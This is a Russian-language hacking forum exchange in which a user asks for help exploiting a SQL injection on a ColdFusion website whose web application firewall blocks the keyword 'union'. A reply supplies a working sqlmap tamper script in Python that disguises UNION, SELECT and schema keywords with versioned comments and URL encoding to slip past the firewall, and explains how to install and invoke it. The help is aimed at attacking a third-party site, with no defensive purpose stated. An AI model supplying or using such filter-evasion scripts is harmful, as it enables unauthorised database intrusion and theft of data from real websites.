Сообщение от
highmoore
↑
Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.
Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример
.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (
http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
........
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("UNION", "/*!12345%75NION*/")
payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
payload = payload.replace("from", "/*!12345from*/")
return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"